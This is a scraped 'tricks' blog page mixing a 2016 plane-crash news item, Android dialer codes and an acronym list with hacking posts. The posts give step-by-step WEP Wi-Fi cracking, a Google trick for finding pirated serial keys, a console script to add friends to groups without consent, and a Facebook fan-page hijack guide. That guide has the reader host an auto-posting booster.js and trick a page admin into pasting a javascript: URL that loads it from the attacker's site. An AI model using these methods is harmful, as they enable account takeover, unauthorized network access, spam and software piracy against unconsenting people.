Fb All Tricks Master

GPRS TRICKS,HACKING TIPS,FACEBOOK TRICKS,MOBILE PHONE TRICKS,COMPUTER TRICKS, ANDROID TRICK, IPHONE

Wednesday, 7 December 2016

Junaid Jamshed Has Been Died With Family

No comments :
Junaid Jamshed Has Been Died With Family 
Pop singer turned religious leader Junaid Jamshed and wife have been reportedly killed in PIA PK-661 plane crash .
Brother of Junaid Jamshed has confirmed the reports of Junaid  traveling in the ill-fated plane.
At least 47 passengers have been feared dead as a Pakistan International Airlines plane flying from Chitral has reportedly crashed on its flight to Islamabad.
Flight PK-661 with 47 passengers went missing near Abbottabad while it was on its way to Islamabad.
The flight departed from Chitral around 3:30pm and was expected to land at Islamabad’s Benazir Bhutto International Airport at around 4:40pm.
A PIA spokesperson told media  that flight PK-661 had disappeared from the air control radar.
According to military’s media wing ISPR, army troops and helicopters have been dispatched to the crash site for rescue efforts.
“We regret to inform that PIA’s ATR-42 aircraft operating as PK-661, carrying around 40 persons lost its contact with control tower on its way from Chitral to Islamabad a short while ago. All resources are being mobilised to locate the aircraft. Media will be kept informed as situation develops,” PIA spokesperson Danial Gilani said in a statement.
“PIA’s emergency response center has been activated and can be accessed at following phone numbers for updates: 0092-21-99044890, 0092-21-99044376 and 0092-21-99044394,” he added.

Saturday, 18 July 2015

Find Any Software Serial Key

No comments :

Find Any Software Serial Key

ok, this is a little trick that i usually use to find cd keys with google.


if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.


I hope this trick help you finding your ccd keys easily

Enjoy :)

Monday, 6 April 2015

Android secret codes

1 comment :

Android secret codes:

For IMEI Number: *#06#
For RAM Memory version:
*#*#3264#*#*
For FTA SW version:
*#*#1111#*#*
For FTA HW version:
*#*#2222#*#*
For Touchscreen version:
*#*#2663#*#*
View Phone Lock Status:
*#7465625#
Executes Emergency Dial Screen
to unlock PUK
Code: **05**#
Enables Voice Dialing Logging
Mode:
*#*#8351#*#*
Disables Voice Dialing Logging
Mode:
*#*#8350#*#*
Change behavior of Power
button:
*#*#7594#*#*
To test Vibration and Back-light
of device:
*#*#0842#*#*
To test Proximity/Distance
Sensor:
*#*#0588#*#*
To test Touchscreen:
*#*#2663#*#*
For Audio Test: *#*#0289#*#*
or
*#*#0673#*#*
To launch Service Mode:
*#*#197328640#*#*
Hidden Service Menu (Motorola
Droid):
##7764726
Field Test: *#*#7262626#*#*
To format the phone:
*2767*3855#
To start GTalk Monitoring:
*#*#8255#*#*
To get PDA, Phone, H/W and RF
Call Date:
*#*#4986*2650468#*#*
Displays Build Time and Change
List number:
*#*#44336#*#*
Packet Loopback Test:
*#*#0283#*#*
LCD Display Test: *#*#0*#*#*
Enter Service Menu (on New
Phones): *#0*#
Diagnostic Configuration:
*#9090#
USB Logging Control: *#872564#
System Dump Mode: *#9900#
To test Bluetooth:
*#*#232331#*#*
To display Bluetooth Physic
Address:
#*#232337#*#
To test secret GPS:
*#*#1472365#*#*
To test other GPS:
*#*#1575#*#*
To test WiFi/Wireless LAN of
phone:
*#*#232339#*#* or
*#*#528#*#* or
*#*#526#*#*
To display Wi-Fi MAC Address:
*#*#232338#*#*
To Restore Factory Settings:
*#*#7780#*#*
To create Immediate backup of
your multimedia
files: *#*#273282*255*
663282*#*#*
To display Phone Information:
*#*#4636#*#*
To get detailed Camera
Information:
*#*#34971539#*#*
For Software & Hardware
Information:
*#12580*369#
To display HSDPA/HSUPA Control
Menu:
*#301279#
By: PrInCe ShEr 
::---ll---::Thanks For Visiting My Blog::---ll---::
Fb Page ::www.facebook.com/tricktips111
Fb Group::www.facebook.com/group/tricktips111

Did You Know

No comments :

Did you know..??

* VIRUS - Vital Information Resource UnderSeized.
* 3G -3rd Generation.
* GSM - Global System for Mobile Communication.
* CDMA - Code Divison Multiple Access.
* UMTS - Universal MobileTelecommunication System.
* SIM - Subscriber Identity Module .
* AVI = Audio Video Interleave
* RTS = Real Time Streaming
* SIS = Symbian OS Installer File
* AMR = Adaptive Multi-Rate Codec
* JAD = Java Application Descriptor
* JAR = Java Archive
* JAD = Java Application Descriptor
* 3GPP = 3rd Generation Partnership Project
* 3GP = 3rd Generation Project
* MP3 = MPEG player lll
* MP4 = MPEG-4 video file
*AAC = Advanced Audio Coding
* GIF= Graphic Interchangeable Format
* JPEG = Joint Photographic Expert Group
* BMP = Bitmap
* SWF = Shock Wave Flash
* WMV = Windows Media Video
* WMA = Windows Media Audio
* WAV = Waveform Audio
* PNG = Portable Network Graphics
* DOC = Document (MicrosoftCorporation)
* PDF = Portable Document Format
* M3G = Mobile 3D Graphics
* M4A = MPEG-4 Audio File
* NTH = Nokia Theme (series 40)
* THM = Themes (Sony Ericsson)
* MMF = Synthetic Music Mobile Application File
* NRT = Nokia Ringtone
* XMF = Extensible Music File
* WBMP = Wireless Bitmap Image
* DVX = DivX Video
* HTML = Hyper Text Markup Language
* WML = Wireless Markup Language
* CD -Compact Disk.
* DVD - Digital Versatile Disk.
*CRT - Cathode Ray Tube.
* DAT - Digital Audio Tape.
* DOS - Disk Operating System.
* GUI -Graphical User Interface.
* HTTP - Hyper Text Transfer Protocol.
* IP - Internet Protocol.
* ISP - Internet Service Provider.
* TCP - Transmission Control Protocol.
* UPS - Uninterruptible Power Supply.
* HSDPA - High Speed Downlink PacketAccess.
* EDGE - Enhanced Data Rate for GSM[GlobalSystem for Mobile Communication] Evolution.
* VHF - Very High Frequency.
* UHF - Ultra High Frequency.
* GPRS - General PacketRadio Service.
* WAP - Wireless ApplicationProtocol.
* TCP - Transmission ControlProtocol .
* ARPANET - Advanced ResearchProject Agency Network.
* IBM - International Business Machines.
* HP - Hewlett Packard.
*AM/FM - Amplitude/ Frequency Modulation.
* WLAN - Wireless Local Area Network

Monday, 30 March 2015

How To Add All Friends On Facebook Group At Onece Click

No comments :

How To Add All Friends On Facebook Group At Onece Click

Have you ever created a Facebook  group, well most of us have tried it but the problem we face is that we can't get many members to it.
How To Add All Friends On Facebook Group At Onece Click



So in this post I will be sharing the code to add all your Facebook Friends to any group either it may be your's or it may not be. This code will simply add everyone without even their permission. On one hand it may be irritating for others but on the other hand (that's yours) it will be quite helpful.
There are many extensions of Chrome which offer the same, but we would not recommend those as most of them not just add friends to a group but also tries to spam your profile in one way or the other.

Note: Use Google Chrome Browser for it.
Follow the steps to Add All Friends to Any Facebook Group:
  • Open the Facebook group where you want to add all your Facebook Friends. Note down the number ofmembers in the group. 
  • Press F12 Button to open up Developers Window.
  • Select Console Window. 
  • Copy the CODE IS HERE and paste it in console window. Press Enter and wait for 10-20 Seconds. (If your friend list is long then it might take some 2-3 minutes) 
  • Now All your Friends will be added to the Group. You may confirm it by noting down the total members of the group.

Don't misuse this code to spam others, Use it wisely. Share this trick with your friends and leave a comment below if you need any further help 













Wednesday, 25 March 2015

HACKING Wi-Fi USING WINDOWS

No comments :

HACKING Wi-Fi USING WINDOWS FOR WEP ENCRYPTED NETWORK.

HACKING Wi-Fi USING WINDOWS

You could either see video or see the steps below.
-------------------------------------------------------------------------
VIDEO
http://www.youtube.com/watch?v=knMUDo5a_Xw#t=276
--------------------------------------------------------------------------
REQUIREMENTS :
A compatible wireless adapter:
This is by far the biggest requirement.The wireless card of your computer has to be compatible with the software CommVIew. This ensures that the wireless card can go into monitor mode which is essential for capturing packets.
CommView for Wi-Fi : http://tinyurl.com/pjue73q
This software will be used to capture the packets from the desired network adapter.
Aircrack-ng GUI : http://tinyurl.com/lgr4zu8
After capturing the packets this software does the actual cracking. 
--------------------------------------------------------------------------
SETTING UP COMMVIEW FOR WI-FI
--Open Commview for Wi-Fi. When CommView opens for the first time it has a driver installation guide. Follow the prompts to install the driver for your wireless card.
--Run CommView for Wi-Fi.
--Click the play icon on the top left of the application window.
--Start scanning for wireless networks.
CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network.
--------------------------------------------------------------------------
SELECTING THE TARGET NETWORK AND CAPTURING PACKETS
A FEW THINGS TO KEEP IN MIND BEFORE CHOOSING THE TARGET WIRELESS NETWORK :
This tutorial is only for WEP encrypted networks, so make sure you select a network with WEP next to its name. 
Choose a network with the highest signal.
Each network will have its details in the right column.
Make sure the WEP network you are choosing has the lowest dB (decibel) value.
Once you have chosen your target network, select it and click Capture to start capturing packets from the desired channel.
Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network follow the given steps.
Right click the desired network and click on copy MAC Address.
Switch to the Rules tab on the top.
On the left hand side choose MAC Addresses.
Enable MAC Address rules.
For 'Action' select 'capture' and for 'Add record' select 'both'.
Now paste the mac address copied earlier in the box below.
We need to capture only data packets for cracking. So, select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets).
Now you have to save the packets so that they can be cracked later. To do this:
Go to the logging tab on top and enable auto saving.
Set Maximum Directory Size to 2000.
Set Average Log File Size to 20.
Step 5: Waiting...
Now the boring part- WAITING!
NOTE: The amount of time taken to capture enough data packets depends on the signal and the networks usage. The minimum number of packets you should capture should be 100,000 for a decent signal.
After you think you have enough packets (at least 100,000 packets), you'll need to export them.
Go to the log tab and click on concatenate logs.
Select all the logs that have been saved.
Do not close CommView for Wi-Fi.
Now navigate to the folder where the concatenated logs have been saved.
Open the log file.
Select File- Export -Wire shark tcpdump format and choose any suitable destination.
This will save the logs with a .cap extension to that location.
--------------------------------------------------------------------------
CRACKING
Run Aircrack-ng GUI.
Choose WEP.
Open your .cap file that you had saved earlier.
Click Launch.
In the command prompt type in the index number of your target wireless network.
Wait for a while. If everything goes fine, the wireless key will be shown.
You may also receive a request to try with more packets. In this case wait until more packets have been captured and repeat the steps to be performed after capturing packets.
--------------------------------------------------------------------------
VIDEO (for those who can't understand the steps)
http://www.youtube.com/watch?v=knMUDo5a_Xw#t=276
--------------------------------------------------------------------------
SOURCE : http://mods-n-hacks.wonderhowto.com/

Tuesday, 24 March 2015

Hack facebook account and Gmail account using Backtrack 5

No comments :

Hack facebook account and Gmail account using Backtrack 5

Hack facebook account and Gmail account using Backtrack 5

Monday, 23 March 2015

How To Change Facebook Profile Name After Limit

No comments :

How To Change Facebook Profile Name After Limit

How To Change Facebook Profile Name After Limit
How to Change Facebook Profile Name after Name Limits Reached.

Has your Facebook Account Name limit is Reached or Exceeded ? 
So do you want to change your Facebook Profile Name After Name Limits ? 

Open This Link .

https://www.facebook.com/help/contact/245617802141709?rdrhc

Fill that form and you have to upload your valid Government-issued Proof - photo ID like a Passport or Driver's license etc and after your upload finishes, finally click "Send" button.

Any 1 Proof will be enough in the list of below examples,
Examples:

Green card, residence permit or immigration papers
Birth certificate
Personal or vehicle insurance card
Marriage certificate
Official name change paperwork
Voter ID card
Non-driver's government ID (ex. disability, SNAP or national ID card)

Note - If you don’t have a government-issued Proof-photo ID, you can submit copies of any 2 other documents that together show your full name, birthday and picture. 

Any 2 Proofs will be needed in the list of below examples,
Examples:

Credit card
Utility bill
School or work ID
Library card
Check
Bus card

For more information about the Submission of Proofs, check the Facebook Help Center Page by Clicking Here. ww.facebook.com/help/centre

Before you submit your any valid ID proof, try to have a real picture on your facebook account because this may help you to get your name change fastly as facebook staff will consider your fb profile as real profile.

My Personal Experience : Earlier I faced this problem and facebook asked me to submit any Valid proof and I submitted my College ID card picture by taking a snap from my mobile. Facebook staff verified it and changed my name within 4-5 days. So I suggest you to take a clear picture of you proof either by Scanning or by capturing from a good camera or mobile.by __---Prince---Sher---__

How To Hack Facebook Fan Page

No comments :

How To Hack Facebook Fan Page



First of all we need to setup an exploit and a website to host the exploit. If you already have a hosting
then its great otherwise there are couple of free hosting websites that can be used for such purposes as
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
Steps that you need to follow>>

1)At first Download the exploit from>>>www.easy-share.com/1913947632/HackPages%20At%20facebook.rar

2)After downloading the exploit, you need to edit it wit any editor software i suggest notepad++, one of
the best editor. You can download it from>>>notepad-plus-plus.org/download

3)Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com
by pressing CTRL+F and replace it with your own email id which you have used while signing up for
Facebook.

4)Now you have to change the viral text which will be sent to the friends of the victims. To do this, find
the textHey See what i got! and replace it with your own text. This text will be sent to the facebook wall
of 15 friends of the victim. Since it is an auto-posting bot, to prevent facebook from blocking it, I
reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to
something more attractive like getprizes.js or booster.js As i have already posted an
>>www.darksite.in/2012/03/orkutgmail-id-hacking-with-social.html


5)Now you have to upload this script to your server. For this make an account at 0fess.net or
000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So
the address where your script is uploaded will be as follows:
---------------------------------------------------------------------------------------------
www.yoursite.0fess.net/booster.js
---------------------------------------------------------------------------------------------
6)Now comes the most important part of this Hack. You need to convince the admin of that Fan page to
put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in
hisbrowser’s address bar and hit enter while he is on Facebook.
---------------------------------------------------------------------------------------------
javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“,
b.body.appendChild(a); void(0)
---------------------------------------------------------------------------------------------
Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format
for more better results.
Now its done you have successfully hacked the admin of the fan page.
These days many Facebook fan page is getting hacked with this trick.so for all admin be secure you self
from these attack this is explained for educational purpose only.
Copyright

Saturday, 21 March 2015

BASICS OF HACKING

No comments :

BASICS OF HACKING


BASICS OF HACKING- (BY PRINCE SHER)

Hacker means someone who finds weaknesses in a computer or computer network, though the term can also refer to someone with an advanced understanding of computers and computer networks.Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge. The subculture that has evolved around hackers is often referred to as the computer underground but it is now an open community. While other uses of the word hacker exist that are not related to computer security, they are rarely used in mainstream context.

Classifications:-

Several subgroups of the computer underground with different attitudes use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. Eric S. Raymond (author of The New Hacker's Dictionary) advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as one wider hacker culture, a view harshly rejected by Raymond himself. Instead of a hacker/cracker dichotomy, they give more emphasis to a spectrum of different categories, such as white hat, grey hat, black hat and script kiddie.
White hat:-

A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council , also known as the International Council of Electronic Commerce Consultants has developed certifications, course ware, classes, and online training covering the diverse arena of Ethical Hacking.
Black hat:-

A "black hat" hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain" (Moore, 2005). Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network.
Part 1: Targeting

The hacker determines what network to break into during this phase. The target may be of particular interest to the hacker, either politically or personally, or it may be picked at random. Next, they will port scan a network to determine if it is vulnerable to attacks, which is just testing all ports on a host machine for a response. Open ports—those that do respond—will allow a hacker to access the system.

Part 2: Research and Information Gathering

It is in this stage that the hacker will visit or contact the target in some way in hopes of finding out vital information that will help them access the system. The main way that hackers get desired results from this stage is from "social engineering", which will be explained below. Aside from social engineering, hackers can also use a technique called "dumpster diving". Dumpster diving is when a hacker will literally search through users' garbage in hopes of finding documents that have been thrown away, which may contain information a hacker can use directly or indirectly, to help them gain access to a network.
Part 3: Finishing The Attack

This is the stage when the hacker will invade the preliminary target that he/she was planning to attack or steal. Many "hackers" will be caught after this point, lured in or grabbed by any data also known as a honeypot (a trap set up by computer security personnel).
Grey hat:-

A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
Elite hacker:-

A social status among hackers, elite is used to describe the most skilled. Newly discovered exploits will circulate among these hackers. Elite groups such as Masters of Deception conferred a kind of credibility on their members.
Script kiddi:-

A script kiddie (or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature).
Neophyt:-

A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.
Blue hat:-

A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
Hacktivis:-

A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. Nation state Intelligence agencies and cyberwarfare operatives of nation states.
Attack:-

A typical approach in an attack on Internet-connected system is:

1. Network enumeration: Discovering information about the intended target.

2. Vulnerability analysis: Identifying potential ways of attack.

3. Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.

In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.
Security exploit:-

A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, Cross Site Scripting and Cross Site Request Forgery which abuse security holes that may result from substandard programming practice. Other exploits would be able to be used through FTP, HTTP, PHP, SSH, Telnet and some web-pages. These are very common in website/domain hacking.
Techniques

Vulnerability scanner:-

A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses.Hackers also commonly use port scanners. These check to see which ports on a specified computer are "open" or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Note that firewalls defend computers from intruders by limiting access to ports/machines both inbound and outbound, but can still be circumvented.)
Password cracking:-

Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Packet sniffer:-

A packet sniffer is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.
Spoofing attack (Phishing):-

A spoofing attack involves one program, system, or website successfully masquerading as another by falsifying data and thereby being treated as a trusted system by a user or another program. The purpose of this is usually to fool programs, systems, or users into revealing confidential information, such as user names and passwords, to the attacker.
Rootkit:-

A rootkit is designed to conceal the compromise of a computer's security, and can represent any of a set of programs which work to subvert control of an operating system from its legitimate operators. Usually, a rootkit will obscure its installation and attempt to prevent its removal through a subversion of standard system security. Rootkits may include replacements for system binaries so that it becomes impossible for the legitimate user to detect the presence of the intruder on the system by looking at process tables.
Social engineering:-

When a Hacker, typically a black hat, is in the second stage of the targeting process, he or she will typically use some social engineering tactics to get enough information to access the network. A common practice for hackers who use this technique, is to contact the system administrator and play the role of a user who cannot get access to his or her system.
Trojan horses:-

A Trojan horse is a program which seems to be doing one thing, but is actually doing another. A trojan horse can be used to set up a back door in a computer system such that the intruder can gain access later. (The name refers to the horse from the Trojan War, with conceptually similar function of deceiving defenders into bringing an intruder inside.)
Viruses:-

A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Therefore, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. While some are harmless or mere hoaxes most computer viruses are considered malicious.
Worm:-

Like a virus, a worm is also a self-replicating program. A worm differs from a virus in that it propagates through computer networks without user intervention. Unlike a virus, it does not need to attach itself to an existing program. Many people conflate the terms "virus" and "worm", using them both to describe any self-propagating program.

Key loggers:-

A key logger is a tool designed to record ('log') every keystroke on an affected machine for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed on the affected machine, such as a user's password or other private data. Some key loggers uses virus-, trojan-, and rootkit-like methods to remain active and hidden. However, some key loggers are used in legitimate ways and sometimes to even enhance computer security. As an example, a business might have a key logger on a computer used at a point of sale and data collected by the key logger could be used for catching employee fraud.